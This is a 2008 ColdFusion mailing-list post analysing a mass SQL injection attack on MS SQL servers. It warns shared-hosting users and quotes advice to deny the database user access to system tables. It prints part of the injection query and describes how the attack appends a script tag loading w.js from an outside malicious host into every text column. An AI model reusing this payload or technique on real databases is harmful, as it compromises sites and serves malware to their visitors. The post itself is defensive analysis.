I tried to decipher the SQL injection which hits my websites thousand times for this week. I found this particular code (it's attacking MS SQL):
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=... or b.xtype=... or b.xtype=... or b.xtype=...) The remaining code is appending script src="http://jjmaoduo.3322.org/csrss/w.js to every string columns found in the whole SQL DB. Now this is real bad for shared hosting customers. Cause even if we protect our sites, that SQL simply queries all tables in the SQL server. So, if you found your data compromise, the leak may have been caused by other sites that are using the same SQL machine, duh! Better alert your webhosting company too. Rizal ColdFusion Custom Tags And More http://www.masrizal.com At 06:37 AM 8/8/2008, you wrote: >I meant to say: Set the deny permission on the system table to the >user that you use to access the database from cf > >At 07:27 PM 8/7/2008, you wrote: > >You should set the permissions on the system table so that you can > >not read or write to the system tables. There ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310461 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
